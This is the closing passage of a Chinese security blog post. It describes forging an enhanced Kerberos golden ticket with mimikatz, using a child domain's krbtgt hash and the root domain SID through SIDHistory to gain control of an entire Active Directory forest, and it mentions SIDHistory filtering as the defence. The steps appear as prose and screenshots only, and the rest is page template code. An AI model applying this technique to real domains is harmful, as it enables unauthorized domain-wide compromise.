<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015439963.png" srcset="/img/loading.gif" lazyload alt="image-20220214015439963"></p>
<p>然后通过mimikatz重新生成包含根域SID的新的金票</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015451804.png" srcset="/img/loading.gif" lazyload alt="image-20220214015451804"></p>
<p>注意这里是不知道根域YUNYING.LAB的krbtgt的密码HASH的，使用的是子域NEWS.YUNYING.LAB中的KRBTGT的密码HASH。</p>
<p>然后再通过dir访问DC. YUNYING.LAB的共享文件夹，发现已经可以成功访问。</p>
<p><img src="/2022/03/04/%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE%E5%92%8C%E7%99%BD%E9%93%B6%E7%A5%A8%E6%8D%AE/image-20220214015504196.png" srcset="/img/loading.gif" lazyload alt="image-20220214015504196"></p>
<p>此时的这个票据票是拥有整个域林的控制权的。我们知道制作增强金票的条件是通过SIDHistory那防御方法就是在域内主机迁移时进行SIDHistory过滤，它会擦除SIDHistory属性中的内容。</p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/172900">https://www.anquanke.com/post/id/172900</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%86%85%E7%BD%91/">内网</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E5%86%85%E7%BD%91/">内网</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/04/MS14068/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">MS14068</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/04/Kerberos%E4%B8%8ESPN/">
                        <span class="hidden-mobile">Kerberos与SPN</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
